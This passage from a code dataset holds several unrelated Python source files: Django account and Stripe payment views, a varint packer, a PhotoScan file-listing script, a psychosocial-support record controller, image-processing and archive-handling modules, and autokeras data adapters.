self.post_number()\n\t\t\tprint(\"============\")\n\t\t\tprint(t)\n\t\t\tt = 100000000+t\n\t\t\treturn JsonResponse({'account':t},status=200)\n\nclass AccountCreate(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tform = UserCreationForm()\n\t\tcontext = {\"form\":form,\"create\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\treturn render(self.request, template_name, context)\n\tdef post(self,*args,**kwargs):\n\t\tform = UserCreationForm(self.request.POST,self.request.FILES)\n\t\tcontext = {\"form\":form,\"create\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\tif form.is_valid():\n\t\t\tuser = self.request.user\n\t\t\trealDate = self.request.POST['date_of_hire']\n\t\t\trealDate = datetime.datetime.strptime(realDate, '%d/%m/%Y').date()\n\t\t\tprint(\"-------------------------\")\n\t\t\tprint(form.cleaned_data.get(\"phone_number\"))\n\t\t\tprint(\"-------------------------\")\n\t\t\tprint(\"is_valid\")\n\t\t\tif(form.cleaned_data.get('position') == \"is_manager\"):\n\t\t\t\tis_manager=True\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_auditor\"):\n\t\t\t\tis_manager=False\n\t\t\t\tis_auditor=True\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_customer_service\"):\n\t\t\t\tis_manager=False\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=True\n\t\t\t\tis_system_admin=False\n\t\t\tif(form.cleaned_data.get('position') == \"is_system_admin\"):\n\t\t\t\tis_manager=True\n\t\t\t\tis_auditor=False\n\t\t\t\tis_customer_service=False\n\t\t\t\tis_system_admin=True\n\t\t\tuser = form.save(user,realDate)\n\t\t\treturn redirect(\"account\")\n\t\tprint(\"is_not_valid\")\n\t\treturn render(self.request, template_name,context)\n\n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"78747494","text":"from django.shortcuts import render\r\nfrom django.views.generic import View\r\nfrom django.http import JsonResponse, HttpResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n# Create your views here.\r\n\r\n\r\nclass PaymentView(View):\r\n def get(self,request,*args,**kwargs):\r\n return render(request,\"core/payment.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef checkout(request):\r\n session = stripe.checkout.Session.create(\r\n payment_method_types=['card'],\r\n line_items=[{\r\n 'price': 'price_1H06q8IdX0gthvYPWudV1aw1',\r\n 'quantity': 1,\r\n }],\r\n mode='payment',\r\n success_url=request.build_absolute_uri(reverse('thanks')) + '?session_id={CHECKOUT_SESSION_ID}',\r\n cancel_url=request.build_absolute_uri(reverse('index')),\r\n )\r\n\r\n return JsonResponse({\r\n 'session_id' : session.id,\r\n 'stripe_public_key' : settings.STRIPE_PUBLIC_KEY\r\n })","sub_path":"day44/payment_integration/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"123535734","text":"import types\r\n\r\nclass VarIntPacker:\r\n\r\n def __init__(self):\r\n self.buffer1 = b''\r\n self.buffer2 = b''\r\n\r\n def addBuffer(self, bytes):\r\n self.buffer1 += bytes\r\n\r\n def packToBuffer(self, bytes):\r\n self.buffer2 += bytes\r\n\r\n def removeBuffer(self, bytes):\r\n self.buffer1 = self.buffer1.strip(\r\n bytes)\r\n\r\n def clear(self):\r\n self.buffer1 = self.buffer1[len(\r\n self.buffer1):]\r\n\r\n self.buffer2 = self.buffer2[len(\r\n self.buffer2):]\r\n\r\n def getLength(self):\r\n return len(self.buffer2)\r\n\r\n def getBuffer(self):\r\n return self.buffer2\r\n\r\n def makeByte(self, bytes):\r\n return chr(bytes)\r\n\r\n def writeByte(self, value):\r\n buffer = b''\r\n\r\n if type(value) == types.StringType:\r\n value = ord(value)\r\n\r\n while 1:\r\n write = value & 0x7f\r\n value >>= 7\r\n\r\n if value:\r\n buffer += self.makeByte(write | 0x80)\r\n else:\r\n buffer += self.makeByte(write)\r\n break\r\n\r\n self.packToBuffer(buffer)\r\n\r\n def readByte(self):\r\n shift = 0\r\n result = 0\r\n\r\n while 1:\r\n try:\r\n # we read from the beginning in the string buffer this funcion removes\r\n # the char after; from the buffer.\r\n i = self.buffer1[0]\r\n except:\r\n raise Exception('Failed to unpack invalid or non-existant bytes!')\r\n\r\n self.removeBuffer(i)\r\n x = ord(i)\r\n result |= (x & 0x7f) << shift\r\n shift += 7\r\n\r\n if not (x & 0x80):\r\n break\r\n \r\n return result","sub_path":"VarIntPacker.py","file_name":"VarIntPacker.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"163458057","text":"import PhotoScan\nimport os\nimport itertools\n\ndoc = PhotoScan.app.document\n\n\ndef get_folder(chunk):\n file = chunk.cameras[0].photo.path\n path = os.path.dirname(file)\n return path\n\n\ndef get_txt_files(folder_path):\n texts = []\n for file in os.listdir(folder_path):\n if file.endswith(\".txt\"):\n path = os.path.join(folder_path, file)\n texts.append(path)\n return texts\n\n\ndef get_folders():\n folders = []\n for chunk in doc.chunks:\n folder = get_folder(chunk)\n folders.append(folder)\n return folders\n\n\ndef get_all_txt_files():\n texts = []\n for folder in get_folders():\n texts.append(get_txt_files(folder))\n join_list = list(itertools.chain.from_iterable(texts))\n return join_list\n\ntexts = get_all_txt_files()\nfor text in texts:\n print(text)\n\nfile = open(r\"C:\\Users\\mkreidler\\Desktop\\agifolders.txt\", \"w\")\nfor path in texts:\n file.write(path)\n file.write(\"\\n\")\nprint(\"done\")\n","sub_path":"Agisoft/get_all_txts.py","file_name":"get_all_txts.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"194030703","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport services.controlers.loggControler\nfrom services.controlers.loggControler import LoggControler\nfrom services.exceptions import *\nfrom services.controlers.controler import Controler\nimport services.querys.psychosocialSupportQuery\nfrom services.querys.psychosocialSupportQuery import PsychosocialSupportQuery\nimport os\nimport hashlib\nimport re\nimport cgi\nimport urllib\nfrom services.tools import *\n\nclass PsychosocialSupportsControler(Controler):\n\tdef __init__(self):\n\t\ttry:\n\t\t\tqueryPath=\"services.querys.psychosocialSupportQuery.PsychosocialSupportQuery()\"\n\t\t\tloggMsg=\"PsychosocialSupportsControler\"\n\t\t\tinfoMsg=\"AYUDA_PSICOSOCIAL\"\n\t\t\tsuper(PsychosocialSupportsControler, self).__init__(queryPath, loggMsg, infoMsg)\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: PsychosocialSupportsControler/__init__()', ERROR_NO_DEFINIDO, e.message)\n\n\tdef getByEventId(self, eventId, sessionJson):\n\t\tobjList=[]\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\tobjs = self.queryObj.getByEventIdAndCompanyId(eventId, sessionJson[\"companyIdSession\"])\n\t\t\tfor obj in objs:\n\t\t\t\tobjList.append(obj.toDictFront())\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getByEventId()', ERROR_NO_DEFINIDO, e.message)\t\n\t\treturn objList, state\n\n\tdef getLastConsecutive(self, eventId, sessionJson):\n\t\tconsecutive=[]\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\tconsecutive = self.queryObj.getConsecutive(eventId, sessionJson[\"companyIdSession\"])\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getByEventId()', ERROR_NO_DEFINIDO, e.message)\t\n\t\treturn consecutive, state\n\n\tdef add(self, eventId, stage, checkInTime, departureTime, name, documentTypeId, documentNum, age, gender, epsOrArs, \n\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, sessionJson):\n\t\tmessage=self.infoMsg+\"_NO_REGISTRADO\"\n\t\tstate = 300\n\t\ttry:\n\t\t\tsessionJson[\"userTypeId\"] = int(sessionJson[\"userTypeId\"])\n\t\t\tsessionJson[\"companyIdSession\"] = int(sessionJson[\"companyIdSession\"])\n\t\t\t# Validaciones\n\t\t\tdoRegister, validateMsg = self.getValidate()\n\t\t\t# Registro\n\t\t\tif doRegister == True:\n\t\t\t\tstate, objId = self.queryObj.add(eventId, stage, checkInTime, departureTime, name, documentTypeId, \n\t\t\t\t\tdocumentNum, age, gender, epsOrArs, \n\t\t\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, sessionJson[\"companyIdSession\"])\n\t\t\t\tif state == OK:\n\t\t\t\t\tmessage = self.infoMsg+\"_REGISTRADO\"\n\t\t\telse:\n\t\t\t\tstate = 203\n\t\t\t\tmessage = validateMsg\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-add()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn message, state\n\n\tdef edit(self, eventId, stage, checkInTime, departureTime, name, documentTypeId, documentNum, age, gender, epsOrArs, \n\t\t\ttownship, temporaryAccommodation, thePatientExpresses, physicalSymptoms, behavioralSymptoms, \n\t\t\tcognitiveSymptoms, personalLosses, materialLosses, triage, socialSupportNetwork, antecedentsProblem, \n\t\t\tguidelinesToFollow, mentalHealthProfessional, professionalCard, signatureProfessional, outpatientTreatment, \n\t\t\tcanMove, reasonForRemission, remitted, affiliationType, whatEntity, ambulance, sdsCode, remissionTime, \n\t\t\tmentalHealthProfessional2, professionalCard2, signatureProfessional2, identifier):\n\t\tmessage=self.infoMsg+\"_NO_MODIFICADO\"\n\t\tstate = 300\n\t\ttry:\n\t\t\tobj = self.queryObj.getById(identifier)\n\t\t\tobj.eventId=eventId\n\t\t\tobj.stage=stage\n\t\t\tobj.checkInTime=checkInTime\n\t\t\tobj.departureTime=departureTime\n\t\t\tobj.name=name\n\t\t\tobj.documentTypeId=documentTypeId\n\t\t\tobj.documentNum=documentNum\n\t\t\tobj.age=age\n\t\t\tobj.gender=gender\n\t\t\tobj.epsOrArs=epsOrArs\n\t\t\tobj.township=township\n\t\t\tobj.temporaryAccommodation=temporaryAccommodation\n\t\t\tobj.thePatientExpresses=thePatientExpresses\n\t\t\tobj.physicalSymptoms=physicalSymptoms\n\t\t\tobj.behavioralSymptoms=behavioralSymptoms\n\t\t\tobj.cognitiveSymptoms=cognitiveSymptoms\n\t\t\tobj.personalLosses=personalLosses\n\t\t\tobj.materialLosses=materialLosses\n\t\t\tobj.triage=triage\n\t\t\tobj.socialSupportNetwork=socialSupportNetwork\n\t\t\tobj.antecedentsProblem=antecedentsProblem\n\t\t\tobj.guidelinesToFollow=guidelinesToFollow\n\t\t\tobj.mentalHealthProfessional=mentalHealthProfessional\n\t\t\tobj.professionalCard=professionalCard\n\t\t\tobj.signatureProfessional=signatureProfessional\n\t\t\tobj.outpatientTreatment=outpatientTreatment\n\t\t\tobj.canMove=canMove\n\t\t\tobj.reasonForRemission=reasonForRemission\n\t\t\tobj.remitted=remitted\n\t\t\tobj.affiliationType=affiliationType\n\t\t\tobj.whatEntity=whatEntity\n\t\t\tobj.ambulance=ambulance\n\t\t\tobj.sdsCode=sdsCode\n\t\t\tobj.remissionTime=remissionTime\n\t\t\tobj.mentalHealthProfessional2=mentalHealthProfessional2\n\t\t\tobj.professionalCard2=professionalCard2\n\t\t\tobj.signatureProfessional2=signatureProfessional2\n\t\t\tself.queryObj.edit(obj)\n\t\t\tmessage=self.infoMsg+\"_MODIFICADO\"\n\t\t\tstate = OK\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-edit()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn message, state\n\n\tdef getValidate(self, **kwargs):\n\t\tvalidate = False\n\t\tvalidateMsg = \"ERROR_EN_VALIDACIÓN\"\n\t\ttry:\n\t\t\t# Aquí se incluyen las validaciones que se requieran\n\t\t\t# En dado caso se cumplan...\n\t\t\tvalidate = True\n\t\t\tvalidateMsg = \"VALIDACIÓN EXITOSA\"\n\t\texcept Exception as e:\n\t\t\tloggControler = LoggControler()\n\t\t\tloggControler.addLogg('Controler: '+self.loggMsg+'-getValidate()', ERROR_NO_DEFINIDO, e.message)\n\t\treturn validate, validateMsg","sub_path":"services/controlers/psychosocialSupportsControler.py","file_name":"psychosocialSupportsControler.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"321114594","text":"from .._tier0 import execute\nfrom .._tier0 import plugin_function\nfrom .._tier0 import Image\n\n@plugin_function\ndef copy_horizontal_slice(source : Image, destination : Image = None, slice_index : int = 0) -> Image:\n \"\"\"This method has two purposes: \n It copies a 2D image to a given slice y position in a 3D image stack or\n It copies a given slice at position y in an image stack to a 2D image.\n\n Parameters\n ----------\n source : Image\n destination : Image, optional\n slice_index : Number, optional\n \n Returns\n -------\n destination\n \n Examples\n --------\n >>> import pyclesperanto_prototype as cle\n >>> cle.copy_slice(source, destination, slice_index)\n \n References\n ----------\n .. [1] https://clij.github.io/clij2-docs/reference_copySlice\n \"\"\"\n\n\n parameters = {\n \"dst\":destination,\n \"src\":source,\n \"slice\":int(slice_index)\n }\n\n if (len(destination.shape) == 3):\n execute(__file__, 'copy_horizontal_slice_to_3d_x.cl', 'copy_horizontal_slice_to_3d', [1, source.shape[0], source.shape[1]], parameters)\n else:\n execute(__file__, 'copy_horizontal_slice_from_3d_x.cl', 'copy_horizontal_slice_from_3d', destination.shape, parameters)\n\n return destination\n","sub_path":"pyclesperanto_prototype/_tier1/_copy_horizontal_slice.py","file_name":"_copy_horizontal_slice.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"247506316","text":"\"\"\" Classes for reading and writing OMEX archives\n\n:Author: Jonathan Karr \n:Date: 2020-04-09\n:Copyright: 2020, Center for Reproducible Biomedical Modeling\n:License: MIT\n\"\"\"\n\nfrom .core import ArchiveWriter, ArchiveReader, ArchiveIoError\nfrom .data_model import Archive, ArchiveFile, ArchiveFormat\nfrom ..data_model import Format, Person\nfrom ..biomodel.data_model import BiomodelFormat\nfrom ..simulation.data_model import SimulationFormat\nfrom ..utils import get_enum_format_by_attr\nimport copy\nimport dateutil.parser\nimport libcombine\nimport os\n\n\n__all__ = ['CombineArchiveWriter', 'CombineArchiveReader']\n\n\nclass CombineArchiveWriter(ArchiveWriter):\n \"\"\" Writer for COMBINE/OMEX archives \"\"\"\n\n def run(self, archive, in_dir, out_file):\n \"\"\" Write an archive to a file\n\n Args:\n archive (:obj:`Archive`): description of archive\n in_dir (:obj:`str`): directory which contains the files in the archive\n out_file (:obj:`str`): path to save archive\n\n Raises:\n :obj:`AssertionError`: if files could not be added to the archive or the archive could not be\n saved\n \"\"\"\n # instantiate archive\n archive_comb = libcombine.CombineArchive()\n\n # set metadata about archive\n self._write_metadata(archive, archive_comb, '.')\n\n # add files to archive\n for file in archive.files:\n assert archive_comb.addFile(\n os.path.join(in_dir, file.filename),\n file.filename,\n file.format.spec_url if file.format else '',\n file is archive.master_file\n )\n self._write_metadata(file, archive_comb, file.filename)\n\n # save archive to a file\n assert archive_comb.writeToFile(out_file)\n\n def _write_metadata(self, obj, archive_comb, filename):\n \"\"\" Write metadata about an archive or a file in an archive\n Args:\n obj (:obj:`Archive` or :obj:`ArchiveFile`): archive or file in an archive\n archive_comb (:obj:`libcombine.CombineArchive`): archive\n filename (:obj:`str`): path of object with archive\n \"\"\"\n desc_comb = libcombine.OmexDescription()\n desc_comb.setAbout(filename)\n if obj.description:\n desc_comb.setDescription(obj.description)\n for author in obj.authors:\n creator_comb = libcombine.VCard()\n if author.first_name:\n creator_comb.setGivenName(author.first_name)\n if author.last_name:\n creator_comb.setFamilyName(author.last_name)\n desc_comb.addCreator(creator_comb)\n if obj.created:\n date_comb = libcombine.Date()\n date_comb.setDateAsString(obj.created.strftime('%Y-%m-%dT%H:%M:%SZ'))\n desc_comb.setCreated(date_comb)\n if obj.updated:\n date_comb = libcombine.Date()\n date_comb.setDateAsString(obj.updated.strftime('%Y-%m-%dT%H:%M:%SZ'))\n desc_comb.getModified().append(date_comb)\n archive_comb.addMetadata(filename, desc_comb)\n\n\nclass CombineArchiveReader(ArchiveReader):\n \"\"\" Reader for COMBINE/OMEX archives \"\"\"\n\n NONE_DATETIME = '2000-01-01T00:00:00Z'\n\n def run(self, in_file, out_dir):\n \"\"\" Read an archive from a file\n\n Args:\n in_file (:obj:`str`): path to save archive\n out_dir (:obj:`str`): directory which contains the files in the archive\n\n Returns:\n :obj:`Archive`: description of archive\n\n Raises:\n :obj:`ArchiveIoError`: archive is invalid\n \"\"\"\n archive_comb = libcombine.CombineArchive()\n if not archive_comb.initializeFromArchive(in_file):\n raise ArchiveIoError(\"Invalid COMBINE archive\")\n\n # instantiate archive\n archive = Archive(format=ArchiveFormat.combine.value)\n\n # read metadata\n self._read_metadata(archive_comb, '.', archive)\n\n # read files\n for filename in archive_comb.getAllLocations():\n filename = filename.c_str()\n file_comb = archive_comb.getEntryByLocation(filename)\n\n if file_comb.isSetFormat():\n spec_url = file_comb.getFormat()\n format = get_enum_format_by_attr(BiomodelFormat, 'spec_url', spec_url)\n if not format:\n format = get_enum_format_by_attr(SimulationFormat, 'spec_url', spec_url)\n if format:\n format = copy.copy(format)\n else:\n format = Format(spec_url=spec_url)\n else:\n format = None\n\n file = ArchiveFile(\n filename=filename,\n format=format,\n )\n self._read_metadata(archive_comb, filename, file)\n archive.files.append(file)\n\n file_comb = archive_comb.getMasterFile()\n if file_comb:\n filename = file_comb.getLocation()\n archive.master_file = next(file for file in archive.files if file.filename == filename)\n\n # extract files\n archive_comb.extractTo(out_dir)\n\n # return information about archive\n return archive\n\n def _read_metadata(self, archive_comb, filename, obj):\n \"\"\" Read metadata about an archive or a file in an archive\n\n Args:\n archive_comb (:obj:`libcombine.CombineArchive`): archive\n filename (:obj:`str`): path to object within archive\n obj (:obj:`Archive` of :obj:`ArchiveFile`): object to add metadata to\n \"\"\"\n desc_comb = archive_comb.getMetadataForLocation(filename)\n if not desc_comb.isEmpty():\n obj.description = desc_comb.getDescription() or None\n\n for creator_comb in desc_comb.getCreators():\n obj.authors.append(Person(\n first_name=creator_comb.getGivenName() or None,\n last_name=creator_comb.getFamilyName() or None,\n ))\n\n created_comb = desc_comb.getCreated().getDateAsString()\n if created_comb == self.NONE_DATETIME:\n obj.created = None\n else:\n obj.created = dateutil.parser.parse(created_comb)\n\n obj.updated = None\n for modified_comb in desc_comb.getModified():\n updated = dateutil.parser.parse(modified_comb.getDateAsString())\n if obj.updated:\n obj.updated = max(obj.updated, updated)\n else:\n obj.updated = updated\n","sub_path":"Biosimulations_utils/archive/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"16648052","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\n\nfrom autokeras.engine import adapter as adapter_module\n\nCATEGORICAL = 'categorical'\nNUMERICAL = 'numerical'\n\n\nclass InputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to Input to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.number):\n raise TypeError('Expect the data to Input to be numerical, but got '\n '{type}.'.format(type=x.dtype))\n\n\nclass ImageInputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to ImageInput to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n if isinstance(x, np.ndarray) and x.ndim not in [3, 4]:\n raise ValueError('Expect the data to ImageInput to have 3 or 4 '\n 'dimensions, but got input shape {shape} with {ndim} '\n 'dimensions'.format(shape=x.shape, ndim=x.ndim))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.number):\n raise TypeError('Expect the data to ImageInput to be numerical, but got '\n '{type}.'.format(type=x.dtype))\n\n def convert_to_dataset(self, x):\n if isinstance(x, np.ndarray):\n if x.ndim == 3:\n x = np.expand_dims(x, axis=3)\n return super().convert_to_dataset(x)\n\n\nclass TextInputAdapter(adapter_module.Adapter):\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data to TextInput to be numpy.ndarray or '\n 'tf.data.Dataset, but got {type}.'.format(type=type(x)))\n\n if isinstance(x, np.ndarray) and x.ndim != 1:\n raise ValueError('Expect the data to TextInput to have 1 dimension, but '\n 'got input shape {shape} with {ndim} dimensions'.format(\n shape=x.shape,\n ndim=x.ndim))\n if isinstance(x, np.ndarray) and not np.issubdtype(x.dtype, np.character):\n raise TypeError('Expect the data to TextInput to be strings, but got '\n '{type}.'.format(type=x.dtype))\n\n def convert_to_dataset(self, x):\n if len(x.shape) == 1:\n x = x.reshape(-1, 1)\n if isinstance(x, np.ndarray):\n x = tf.data.Dataset.from_tensor_slices(x)\n return x\n\n\nclass StructuredDataInputAdapter(adapter_module.Adapter):\n\n def __init__(self, column_names=None, column_types=None, **kwargs):\n super().__init__(**kwargs)\n self.column_names = column_names\n self.column_types = column_types\n # Variables for inferring column types.\n self.count_nan = None\n self.count_numerical = None\n self.count_categorical = None\n self.count_unique_numerical = []\n self.num_col = None\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'count_nan': self.count_nan,\n 'count_numerical': self.count_numerical,\n 'count_categorical': self.count_categorical,\n 'count_unique_numerical': self.count_unique_numerical,\n 'num_col': self.num_col\n })\n return config\n\n @classmethod\n def from_config(cls, config):\n obj = super().from_config(config)\n obj.count_nan = config['count_nan']\n obj.count_numerical = config['count_numerical']\n obj.count_categorical = config['count_categorical']\n obj.count_unique_numerical = config['count_unique_numerical']\n obj.num_col = config['num_col']\n\n def check(self, x):\n if not isinstance(x, (pd.DataFrame, np.ndarray)):\n raise TypeError('Unsupported type {type} for '\n '{name}.'.format(type=type(x),\n name=self.__class__.__name__))\n\n # Extract column_names from pd.DataFrame.\n if isinstance(x, pd.DataFrame) and self.column_names is None:\n self.column_names = list(x.columns)\n # column_types is provided by user\n if self.column_types:\n for column_name in self.column_types:\n if column_name not in self.column_names:\n raise ValueError('Column_names and column_types are '\n 'mismatched. Cannot find column name '\n '{name} in the data.'.format(\n name=column_name))\n\n # Generate column_names.\n if self.column_names is None:\n if self.column_types:\n raise ValueError('Column names must be specified.')\n self.column_names = [index for index in range(x.shape[1])]\n\n # Check if column_names has the correct length.\n if len(self.column_names) != x.shape[1]:\n raise ValueError('Expect column_names to have length {expect} '\n 'but got {actual}.'.format(\n expect=x.shape[1],\n actual=len(self.column_names)))\n\n def convert_to_dataset(self, x):\n if isinstance(x, pd.DataFrame):\n # Convert x, y, validation_data to tf.Dataset.\n x = x.values.astype(np.unicode)\n if isinstance(x, np.ndarray):\n x = x.astype(np.unicode)\n dataset = tf.data.Dataset.from_tensor_slices(x)\n return dataset\n\n def fit(self, dataset):\n super().fit(dataset)\n for x in dataset:\n self.update(x)\n self.infer_column_types()\n\n def update(self, x):\n # Calculate the statistics.\n x = nest.flatten(x)[0].numpy()\n if self.num_col is None:\n self.num_col = len(x)\n self.count_nan = np.zeros(self.num_col)\n self.count_numerical = np.zeros(self.num_col)\n self.count_categorical = np.zeros(self.num_col)\n for i in range(len(x)):\n self.count_unique_numerical.append({})\n for i in range(self.num_col):\n x[i] = x[i].decode('utf-8')\n if x[i] == 'nan':\n self.count_nan[i] += 1\n elif x[i] == 'True':\n self.count_categorical[i] += 1\n elif x[i] == 'False':\n self.count_categorical[i] += 1\n else:\n try:\n tmp_num = float(x[i])\n self.count_numerical[i] += 1\n if tmp_num not in self.count_unique_numerical[i]:\n self.count_unique_numerical[i][tmp_num] = 1\n else:\n self.count_unique_numerical[i][tmp_num] += 1\n except ValueError:\n self.count_categorical[i] += 1\n\n def infer_column_types(self):\n column_types = {}\n for i in range(self.num_col):\n if self.count_categorical[i] > 0:\n column_types[self.column_names[i]] = CATEGORICAL\n elif len(self.count_unique_numerical[i])/self.count_numerical[i] < 0.05:\n column_types[self.column_names[i]] = CATEGORICAL\n else:\n column_types[self.column_names[i]] = NUMERICAL\n # Partial column_types is provided.\n if self.column_types is None:\n self.column_types = {}\n for key, value in column_types.items():\n if key not in self.column_types:\n self.column_types[key] = value\n\n\nclass TimeseriesInputAdapter(adapter_module.Adapter):\n\n def __init__(self,\n lookback=None,\n column_names=None,\n column_types=None,\n **kwargs):\n super().__init__(**kwargs)\n self.lookback = lookback\n self.column_names = column_names\n self.column_types = column_types\n\n def get_config(self):\n config = super().get_config()\n config.update({\n 'lookback': self.lookback,\n 'column_names': self.column_names,\n 'column_types': self.column_types\n })\n return config\n\n def check(self, x):\n \"\"\"Record any information needed by transform.\"\"\"\n if not isinstance(x, (pd.DataFrame, np.ndarray, tf.data.Dataset)):\n raise TypeError('Expect the data in TimeseriesInput to be numpy.ndarray'\n ' or tf.data.Dataset or pd.DataFrame, but got {type}.'.\n format(type=type(x)))\n\n if isinstance(x, np.ndarray) and x.ndim != 2:\n raise ValueError('Expect the data in TimeseriesInput to have 2 dimension'\n ', but got input shape {shape} with {ndim} '\n 'dimensions'.format(\n shape=x.shape,\n ndim=x.ndim))\n\n # Extract column_names from pd.DataFrame.\n if isinstance(x, pd.DataFrame) and self.column_names is None:\n self.column_names = list(x.columns)\n # column_types is provided by user\n if self.column_types:\n for column_name in self.column_types:\n if column_name not in self.column_names:\n raise ValueError('Column_names and column_types are '\n 'mismatched. Cannot find column name '\n '{name} in the data.'.format(\n name=column_name))\n\n # Generate column_names.\n if self.column_names is None:\n if self.column_types:\n raise ValueError('Column names must be specified.')\n self.column_names = [index for index in range(x.shape[1])]\n\n # Check if column_names has the correct length.\n if len(self.column_names) != x.shape[1]:\n raise ValueError('Expect column_names to have length {expect} '\n 'but got {actual}.'.format(\n expect=x.shape[1],\n actual=len(self.column_names)))\n\n def convert_to_dataset(self, x):\n if isinstance(x, pd.DataFrame):\n # Convert x, y, validation_data to tf.Dataset.\n x = x.values.astype(np.float32)\n if isinstance(x, np.ndarray):\n x = x.astype(np.float32)\n x = tf.data.Dataset.from_tensor_slices(x)\n x = x.window(self.lookback, shift=1, drop_remainder=True)\n final_data = []\n for window in x:\n final_data.append([elems.numpy() for elems in window])\n final_data = tf.data.Dataset.from_tensor_slices(final_data)\n return final_data\n","sub_path":"autokeras/adapters/input_adapter.py","file_name":"input_adapter.py","file_ext":"py","file_size_in_byte":11299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"316615353","text":"# coding=utf-8\nfrom flask import g\nfrom sqlalchemy import text\n\n\ndef execute(sql=None, firstonly=False, params=None):\n result = []\n if sql:\n if firstonly:\n row = g.tran.execute(text(sql), params).first()\n if row:\n column = {}\n for col in row.items():\n column[col[0]] = col[1]\n result.append(column)\n else:\n rows = g.tran.execute(text(sql), params).fetchall()\n for row in rows:\n column = {}\n for col in row.items():\n column[col[0]] = col[1]\n result.append(column)\n return result\n\n","sub_path":"backend/app/helper/sql_utils.py","file_name":"sql_utils.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"508949354","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/ArenaExcel/etc/ArenaExcelActions.py\"\nimport ArenaExcelHtmlSheet\nimport FHtmlClipboard\nimport ArenaExcelSheet\nimport FClipboard\n\n\nfrom 